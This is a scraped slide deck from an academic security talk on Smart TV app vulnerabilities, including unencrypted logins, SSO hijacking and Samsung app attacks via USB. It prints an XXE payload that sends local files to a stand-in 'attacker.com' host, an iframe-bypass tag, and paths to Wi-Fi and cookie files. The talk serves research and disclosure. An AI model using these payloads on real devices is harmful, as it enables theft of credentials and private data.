not so smart on smart tv apps
play

Not so Smart: On Smart TV Apps Marcus Niemietz , Juraj - PowerPoint PPT Presentation

Nov 01, 2023 •224 likes •661 views

Not so Smart: On Smart TV Apps Marcus Niemietz , Juraj Somorvsky, Chris;an Mainka, Jrg Schwenk {firstname.lastname}@rub.de Ruhr University Bochum &

  1. Not ¡so ¡Smart: ¡On ¡Smart ¡TV ¡Apps ¡ ¡ Marcus ¡Niemietz , ¡Juraj ¡Somorvsky, ¡Chris;an ¡ Mainka, ¡Jörg ¡Schwenk ¡ {firstname.lastname}@rub.de ¡ ¡ Ruhr ¡University ¡Bochum ¡& ¡3curity ¡GmbH ¡

  2. Table ¡of ¡Contents ¡ • Horst ¡Görtz ¡Ins;tute ¡for ¡IT ¡security ¡ • 3curity ¡GmbH: ¡Trainings, ¡Pentests ¡ • German ¡book ¡about ¡UI ¡redressing ¡ • Speaker ¡at ¡ ¡Black ¡Hat, ¡BlueHat, ¡ ¡ PHDays, ¡Zeronights, ¡OWASP, ¡... ¡ • TwiXer: ¡@mniemietz ¡ • mail@mniemietz.de ¡

  3. Table ¡of ¡Contents ¡ 1. Introduc;on ¡& ¡Generaliza;on ¡ 2. Tested ¡Devices ¡ 3. AXacker ¡Model ¡ 4. Eavesdropping ¡AXtacks ¡ 5. Samsung: ¡AXached ¡Storage ¡and ¡Web ¡AXacks ¡ 6. Conclusions ¡

  4. 1. ¡Introduc;on ¡& ¡ ¡ Generaliza;on ¡

  5. Introduc;on ¡ • “Years” ¡ago: ¡ ¡TVs ¡were ¡a ¡medium ¡to ¡watch ¡ news, ¡broadcasts, ¡documentaries, ¡or ¡ blockbusters ¡ • Smart ¡TV: ¡ TV ¡+ ¡computer ¡with ¡Internet ¡connec;on ¡

  6. Introduc;on ¡ • Smart ¡TV ¡apps ¡ – Social ¡networks ¡like ¡Facebook ¡ – Streaming ¡services ¡like ¡Nealix ¡or ¡Watchever ¡ – Games ¡like ¡Angry ¡Birds ¡ – Browsing ¡websites ¡

  7. Generaliza;on ¡ • Can ¡be ¡also ¡applied ¡to ¡different ¡scenarios ¡ beyond ¡Smart ¡TVs ¡ – Internet ¡connec;on ¡ – App ¡rendering ¡engine(s) ¡(e.g., ¡from ¡a ¡browser) ¡ – Installed ¡aXacker’s ¡app ¡ • „Internet ¡of ¡Things“ ¡is ¡nearly ¡everywhere ¡

  8. 2. ¡Tested ¡Devices ¡

  9. Tested ¡Devices ¡

  10. 3. ¡AXacker ¡Model ¡

  11. AXacker ¡Model ¡ • Eavesdropper ¡ – Sniffing ¡HTTP ¡traffic ¡ • AXached ¡Storage ¡AXacker ¡ – For ¡example ¡a ¡USB ¡flash ¡drive ¡ • Malware ¡AXacker ¡ – Device’s ¡app ¡store ¡or ¡aXacker ¡controlled ¡website ¡

  12. 4. ¡Eavesdropping ¡AXacks ¡

  13. Eavesdropping ¡AXtacks ¡

  14. Vulnerable ¡Login ¡Apps ¡ • Samsung ¡ – 25 ¡pre-­‑installed ¡ (WATCHEVER ¡v2.200, ¡ImmoScout24 ¡v1.010) ¡ – 31 ¡app ¡store ¡ ¡ (NewMoove ¡v2.2003, ¡Putpat ¡TV ¡v2.504) ¡ • Grundig ¡ – ¡34 ¡apps: ¡Facebook, ¡Ebay, ¡and ¡Viewster ¡ • Apple: ¡WATCHEVER, ¡Google ¡& ¡Amazon: ¡0 ¡

  15. ¡Privacy ¡Viola;on ¡and ¡SSO ¡Hijacking ¡ Wireshark ¡logs ¡ DeepSec ¡DEMO ¡

  16. ¡Privacy ¡Viola;on ¡and ¡SSO ¡Hijacking ¡

  17. VEVO ¡App: ¡Market ¡Research ¡Traffic ¡

  18. VEVO ¡App: ¡Market ¡Research ¡Traffic ¡ • „ScorecardResearch ¡... ¡market ¡research ¡ community, ¡a ¡leading ¡global ¡market ¡research ¡ effort ¡that ¡studies ¡and ¡reports ¡on ¡Internet ¡ trends ¡and ¡behavior. ¡ScorecardResearch ¡ conducts ¡research ¡by ¡collec;ng ¡Internet ¡web ¡ browsing ¡data ¡and ¡then ¡uses ¡that ¡data ¡to ¡help ¡ show ¡how ¡people ¡use ¡the ¡Internet, ¡what ¡they ¡ like ¡about ¡it, ¡and ¡what ¡they ¡don’t.“ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ Source: ¡www.scorecardresearch.com ¡

  19. Samsung ¡SSO ¡

  20. ¡Privacy ¡Viola;on ¡and ¡SSO ¡Hijacking ¡ • Access ¡to ¡ – Samsung ¡GALAXY ¡Apps ¡ – Samsung ¡Link ¡ – Find ¡My ¡Mobile ¡ – Smart ¡Appliance ¡ – Samsung ¡e-­‑Store ¡ – PEN.UP ¡ – Samsung ¡Wallet, ¡S ¡Health, ¡Samsung ¡Cloud, ¡... ¡

  21. 5. ¡Samsung: ¡AXached ¡Storage ¡ ¡ and ¡Web ¡AXacks ¡

  22. Samsung ¡Apps ¡ • Basically ¡just ¡a ¡normal ¡website ¡ ¡(HTML5, ¡CSS, ¡JavaScript) ¡ – config.xml – index.html – Op;onal ¡HTML, ¡CSS, ¡JS, ¡etc. ¡ • Can ¡be ¡loaded ¡from ¡a ¡USB ¡device ¡

  23. Samsung ¡Apps ¡ • navigator.userAgent – Mozilla/5.0 ¡(SmartHub;SMART-­‑TV;U;Linux/ SmartTV+2014;Maple2012) ¡AppleWebKit/537.42+ ¡ (KHTML, ¡like ¡Gecko) ¡Smart ¡TV ¡Safari/537.42+ ¡

  24. Samsung ¡Apps ¡ • document.location – file:///dtv/usb/sda1/UIR6_0.100_Europe_20150309/ index.html?country=D&language=17&lang=en-­‑ GB&modelid=14_X14_2D&server=opera;on&remoco n=0_650_259_22&area=PANEURO&product=0&mgrv er=6.1571& ssoid=foobar@example.org & ssopw=secr et &authtoken= MORE-­‑STUFF &all_ar;st=jennifer-­‑ lopez&x_ar;st=&video_content_type=vevotv&ns_st_ pr=Top10Now&realmodel=UE22H5600&networktype =0 ¡

  25. Samsung ¡App ¡Bypass ¡ • <iframe> ¡ is ¡not ¡supported ¡in ¡the ¡app ¡context ¡ – Security ¡reasons? ¡ – Any ¡ideas ¡for ¡a ¡bypass? ¡

  26. Samsung ¡App ¡Bypass ¡ • <iframe> ¡ is ¡not ¡supported ¡in ¡the ¡app ¡context ¡ • Thank ¡you ¡HTML! <object class= "iframelook" type="text/html" data="http:// www.attackers.org/tv" style="width: 100%; height:100%“>

  27. Samsung ¡File ¡Browser ¡via ¡our ¡App ¡

  28. Directory ¡lis;ng: ¡ file:///

  29. App ¡Install ¡ • AXack ¡via ¡USB ¡flash ¡drive ¡ – XML ¡External ¡En;ty: ¡ Read ¡files ¡with ¡ one ¡line ¡automa;cally ¡ • /dtv/cm_version_name ¡ • /mtd_chmap/opera;ng_account_data ¡ – XMLHXpRequest: ¡ Read ¡ all ¡files ¡ by ¡ac;va;ng ¡the ¡app ¡ • /mtd_chmap/network/wpa_sta.conf ¡ • /mtd_pers/cookies ¡(FB ¡sends ¡data ¡to ¡South ¡Korea?) ¡

  30. XXE ¡ • Config.xml ¡ <?xml ¡version="1.0" ¡encoding="UTF-­‑8"?> ¡ <!DOCTYPE ¡rooXag ¡[ ¡ <!ENTITY ¡% ¡ext ¡SYSTEM ¡"file:///mtd_chmap/…"> ¡ <!ENTITY ¡% ¡dtd ¡SYSTEM ¡"file:///dtv/usb/sda1/XXE/ aXacker.xml"> ¡ ¡ ¡ %dtd; ¡ ]> ¡ <widget ¡xmlns="hXp://www.samsung.com/"> ¡… ¡ • A,acker.xml ¡ <!ENTITY ¡% ¡all ¡"<!ENTITY ¡send ¡SYSTEM ¡'hXp:// www.aXacker.com/tv/?%ext;'>"> ¡ %all ¡

  31. file:// • App ¡can ¡“access” ¡all ¡(?) ¡files ¡ – Wifi ¡data ¡(incl. ¡password) ¡ – Apps ¡Cookies ¡ ¡ – Local ¡Storage ¡(ZaXoo: ¡login ¡data) ¡ – SSO ¡username ¡ (one ¡line) ¡ – Browser ¡history ¡ – Common ¡user ¡inputs ¡ • FB ¡and ¡Samsung-­‑SSO ¡username/password ¡ – Par;al ¡webcam ¡access ¡

  32. file:// & OAuth ¡ • OAuth ¡is ¡not ¡to ¡log ¡in ¡the ¡user ¡into ¡an ¡applica;on, ¡ but ¡to ¡grant ¡access ¡rights ¡on ¡specific ¡resources ¡to ¡ it ¡ • We ¡have ¡Samsung‘s ¡Facebook ¡Connect ¡ API-­‑Key ¡ and ¡ apiSecret ¡ – We ¡can ¡make ¡a ¡spoofed ¡client ¡ – We ¡cannot ¡get ¡user ¡creden;als ¡ • Proof? ¡

  33. file:// & OAuth ¡ • Only ¡at ¡the ¡conference, ¡sorry! ¡

  34. file:// & OAuth ¡

  35. file:// & OAuth ¡

  36. Just ¡saying ¡... ¡ • A ¡never ¡ending ¡story? ¡ – Leaking ¡data ¡is ¡not ¡new ¡ • Samsung ¡SmartTV ¡customers ¡warned ¡personal ¡ conversa;ons ¡may ¡be ¡recorded ¡(hXp://is.gd/Wxq2oy) ¡ • Read ¡It ¡Twice! ¡A ¡mass-­‑storage-­‑based ¡TOCTTOU ¡aXack ¡ (hXp://is.gd/VLC0yE) ¡ – Leaking ¡creden;als ¡without ¡any ¡aXack ¡is ¡new ¡

  37. Just ¡saying ¡... ¡ • Our ¡research ¡was ¡covered ¡by ¡the ¡German ¡ media ¡(Heise, ¡Golem, ¡WDR, ¡and ¡ORF) ¡ – What ¡happens? ¡ • Consumer ¡advice ¡centre ¡of ¡NRW ¡(Germany) ¡ hXps://www.vz-­‑nrw.de/klage-­‑gegen-­‑samsung ¡

  38. Samsung ¡Smart ¡TV ¡Bug ¡Bounty ¡

  39. Samsung ¡TV ¡Bounty ¡ • �“The ¡bugs ¡that ¡are ¡eligible ¡will ¡be ¡payed ¡ according ¡to ¡the ¡site ¡policy: ¡ – we ¡reward ¡only ¡unknown ¡and ¡unreported ¡issues ¡ on ¡TV/Blueray ¡models ¡from ¡E-­‑Series ¡and ¡above ¡ (2012 ¡to ¡2015). ¡ – you ¡agree ¡not ¡to ¡disclose ¡the ¡vulnerabili;es ¡to ¡3rd ¡ par;es ¡without ¡our ¡agreement ¡(we ¡can ¡agree ¡on ¡a ¡ publica;on ¡date ¡axer ¡the ¡security ¡patches ¡are ¡ deployed)“ ¡

  40. 6. ¡Conclusions ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

SMART ENERGY SMART ASSET SMART SMART SMART &amp; CUSTOMER ASSET PURPOSE PEOPLE

SMART ENERGY SMART ASSET SMART SMART SMART &amp; CUSTOMER ASSET PURPOSE PEOPLE

Smart Energy Foundations SMART ENERGY SMART ASSET SMART SMART SMART &amp; CUSTOMER ASSET PURPOSE PEOPLE INTERACTION MANAGEMENT SMART STAKEHOLDER &amp; GOVERNMENT ENGAGEMENT 1 CLPs Sustainability Principles Sustainability has

389 views • 5 slides
Smart Metering Smart Metering The Power of Smart Metering The Power of Smart Metering MOST

Smart Metering Smart Metering The Power of Smart Metering The Power of Smart Metering MOST

an energy technology company Smart Metering Smart Metering The Power of Smart Metering The Power of Smart Metering MOST EFFICIENT USE OF ENERGY 41 Watchung Plaza #175 Montclair, NJ 07042-4117 Tel 1.800.781.1232 Fax 973.783.3047 8001

846 views • 12 slides
Lumos: Improving Smart Home IoT Visibility and Interoperability Through Analyzing Mobile Apps

Lumos: Improving Smart Home IoT Visibility and Interoperability Through Analyzing Mobile Apps

Lumos: Improving Smart Home IoT Visibility and Interoperability Through Analyzing Mobile Apps Jeongmin Kim * , Steven Y. Ko , Sooel Son * and Dongsu Han * KAIST * , University at Buffalo, The State University of New York, USA 1 Smart

802 views • 32 slides
Tizen. Using the Smart Approach to Attract Apps the problem highly fragmented app market 3

Tizen. Using the Smart Approach to Attract Apps the problem highly fragmented app market 3

Tizen. Using the Smart Approach to Attract Apps the problem highly fragmented app market 3 825,000 850,000 145,000 * *Windows Phone Store 4 consumers developers 5 6 Xchange acts as a thin-wholesale layer between stores and apps 7

278 views • 26 slides
Quality of Life - Smart Mobility - Smart Infrastructure - Smart People, Smart Living ARC 590

Quality of Life - Smart Mobility - Smart Infrastructure - Smart People, Smart Living ARC 590

Quality of Life - Smart Mobility - Smart Infrastructure - Smart People, Smart Living ARC 590 Swapnil Patil - Smart Mobility Sustainable Transformation One may expect major changes regarding mobility in the near future. As mobility has

289 views • 24 slides
Smart Grid Increasing the IQ of the Smart Grid Unclear exactly what the smart grid is, but

Smart Grid Increasing the IQ of the Smart Grid Unclear exactly what the smart grid is, but

Smart Grid Increasing the IQ of the Smart Grid Unclear exactly what the smart grid is, but Through Active Customer it does include Participation in Wholesale Electricity Interval meters Markets Storage and load flexibility

465 views • 15 slides
ARE YOU SMART ENOUGH FOR SMART? Presentation by SMART Presentation 1 February 27, 2018 Chad

ARE YOU SMART ENOUGH FOR SMART? Presentation by SMART Presentation 1 February 27, 2018 Chad

ARE YOU SMART ENOUGH FOR SMART? Presentation by SMART Presentation 1 February 27, 2018 Chad Laurent, Principal Meister Consultants Group, A Cadmus Company Using global best practices to inform local decisions International sustainability

621 views • 35 slides
Enabling third-party apps in home gateways for and (through virtualization, edge

Enabling third-party apps in home gateways for and (through virtualization, edge

Enabling third-party apps in home gateways for and (through virtualization, edge computing, SDN, and RF management) Suman Banerjee (suman@cs.wisc.edu) 1 IoT and smart home apps IoT and smart home apps Should the cloud manage

852 views • 45 slides
SMART STAFFORDSHIRE Enabling citizens and businesses to flourish in the digital age SMART SMART

SMART STAFFORDSHIRE Enabling citizens and businesses to flourish in the digital age SMART SMART

SMART STAFFORDSHIRE Enabling citizens and businesses to flourish in the digital age SMART SMART PEOPLE LIVING SMART WORKING WHAT IS SMART STAFFORDHSIRE? Umbrella that will help position Staffordshire at forefront of digital / digital

339 views • 13 slides
Smart Devices Need Smart People: Learn How to Be Smart! ELIZABETH A EVANS, DUKE DIGITAL

Smart Devices Need Smart People: Learn How to Be Smart! ELIZABETH A EVANS, DUKE DIGITAL

Smart Devices Need Smart People: Learn How to Be Smart! ELIZABETH A EVANS, DUKE DIGITAL INITIATIVE ALYSE ZAVALA, DUKE IT SECURITY OFFICE INTERNET OF THINGS (IoT) u The network of physical devices, smart appliances, vehicles, and other items

88 views • 8 slides
Sustainability and Smart Grid Implementing a Non residential Smart Metering System PaperCon

Sustainability and Smart Grid Implementing a Non residential Smart Metering System PaperCon

Sustainability and Smart Grid Implementing a Non residential Smart Metering System PaperCon 2011 Page 195 Smart Grid Popular Topics in the News Smart Grid Smart Meter Smart Meter Micro Grid Distributive Generation Most talk is

427 views • 39 slides
Smart Grid As Smart as the Quality of its Measurements by Linoh Magagula, PhD, MIEEE,

Smart Grid As Smart as the Quality of its Measurements by Linoh Magagula, PhD, MIEEE,

Smart Grid As Smart as the Quality of its Measurements by Linoh Magagula, PhD, MIEEE, National Metrology Institute of South Africa (NMISA) Smart: communication; sensing; control Smart grid intelligently integrated electricity

397 views • 18 slides
Welcome! Setting Up SMART Response Objectives: Integrating SMART Response &amp; Web 2.0 for

Welcome! Setting Up SMART Response Objectives: Integrating SMART Response &amp; Web 2.0 for

November 10, 2014 Welcome! Setting Up SMART Response Objectives: Integrating SMART Response &amp; Web 2.0 for Formative Define SMART Response &amp; its uses in the classroom Assessments Understand how the SMART Response system works Be able

489 views • 17 slides
San Antonios Smart City Program Smart City Initiative A Smart City is one that uses data and

San Antonios Smart City Program Smart City Initiative A Smart City is one that uses data and

San Antonios Smart City Program Smart City Initiative A Smart City is one that uses data and technology to improve the quality of life for its residents. Sustainability Transportation Digital Connected Living Key Projects SATRIP

611 views • 14 slides
Smart and Adaptive Cyber-Physical Systems Chapters 1,2 Cyber-Physical Systems Smart mobility

Smart and Adaptive Cyber-Physical Systems Chapters 1,2 Cyber-Physical Systems Smart mobility

Smart and Adaptive Cyber-Physical Systems Chapters 1,2 Cyber-Physical Systems Smart mobility Smart factory Smart grid Smart XX Smart health care Smart city But what does it mean to be smart ?

1.79k views • 102 slides
UPM DAY 1: SMART GRIDS TABLE 1: TECHNOLOGICAL CHALLENGES RELATED WITH SMART GRIDS DEVELOPMENT

UPM DAY 1: SMART GRIDS TABLE 1: TECHNOLOGICAL CHALLENGES RELATED WITH SMART GRIDS DEVELOPMENT

Guillermo del Campo UPM DAY 1: SMART GRIDS TABLE 1: TECHNOLOGICAL CHALLENGES RELATED WITH SMART GRIDS DEVELOPMENT INTERNATIONAL SUMMER SCHOOL SMART GRIDS AND SMART CITIES Barcelona, 6-8 June 2017 Context Dramatic growth of energy

618 views • 16 slides
Statistical Modelling under Epistemic Data Imprecision Some Results on Estimating Multinomial

Statistical Modelling under Epistemic Data Imprecision Some Results on Estimating Multinomial

Statistical Modelling under Epistemic Data Imprecision Some Results on Estimating Multinomial Distributions and Logistic Regression for Coarse Categorical Data Julia Plass*, Thomas Augustin*, Marco Cattaneo**, Georg Schollmeyer* *Department of

286 views • 17 slides
Welcome 1 Introduction &amp; Background Indigenous people have been living in the Chittagong

Welcome 1 Introduction &amp; Background Indigenous people have been living in the Chittagong

Welcome 1 Introduction &amp; Background Indigenous people have been living in the Chittagong Hill Tracts (CHT) for centuries, divided in tribes, following their unique rituals, customs, languages, dress, cultural practices and rules. CHT

465 views • 22 slides
Overview Language Perspectives Input Processor Output ! Imperative: Mode of computation - a

Overview Language Perspectives Input Processor Output ! Imperative: Mode of computation - a

Overview Language Perspectives Input Processor Output ! Imperative: Mode of computation - a variable (state) CSCI: 4500/6500 Programming Von Neumann Machines Memory modify variables in memory Languages Turing machines - imperative -

358 views • 6 slides
Grammar Update for Indonesian Resource Grammar (INDRA) David Moeljadi and many more Division of

Grammar Update for Indonesian Resource Grammar (INDRA) David Moeljadi and many more Division of

Grammar Update for Indonesian Resource Grammar (INDRA) David Moeljadi and many more Division of Linguistics and Multilingual Studies, Nanyang Technological University, Singapore The 13th DELPH-IN Summit, University of Oslo 7 August 2017

363 views • 8 slides
Marco Ghiglieri Web 2.0 Security &amp; Privacy 2014 Workshop In conjunction with the IEEE

Marco Ghiglieri Web 2.0 Security &amp; Privacy 2014 Workshop In conjunction with the IEEE

I Know What You Watched Last Sunday A New Survey of Privacy in HbbTV May 18, 2014 Marco Ghiglieri Web 2.0 Security &amp; Privacy 2014 Workshop In conjunction with the IEEE Symposium on Security and Privacy May 18, 2014 | I Know What You

287 views • 26 slides
Connected Consumers We have two key data sources to hand MediaTel Connected TV Tracker A

Connected Consumers We have two key data sources to hand MediaTel Connected TV Tracker A

Connected Consumers We have two key data sources to hand MediaTel Connected TV Tracker A quarterly study focusing on connected and catch-up TV (attitudes and take-up) 15-minute online survey completed by 2,000 respondents per wave

322 views • 17 slides
Deep complementary Mateusz Budnik 1 features for speaker Ali Khodabakhsh 2 Laurent Besacier 1

Deep complementary Mateusz Budnik 1 features for speaker Ali Khodabakhsh 2 Laurent Besacier 1

Deep complementary Mateusz Budnik 1 features for speaker Ali Khodabakhsh 2 Laurent Besacier 1 Cenk Demiroglu 2 identification in TV broadcast data 1 Univ. Grenoble-Alpes 2 Ozyegin University Agenda Motivation Related work System

308 views • 17 slides
JavaScript on TV Building full screen apps with Vue.js Welcome to multiplatform hell. Theres

JavaScript on TV Building full screen apps with Vue.js Welcome to multiplatform hell. Theres

JavaScript on TV Building full screen apps with Vue.js Welcome to multiplatform hell. Theres so many of them! LG Netcast LG WebOS Samsung Tizen Android TV Firefox OS (srsly.) Roku TV Fire TV tvOS and the

307 views • 18 slides

More recommend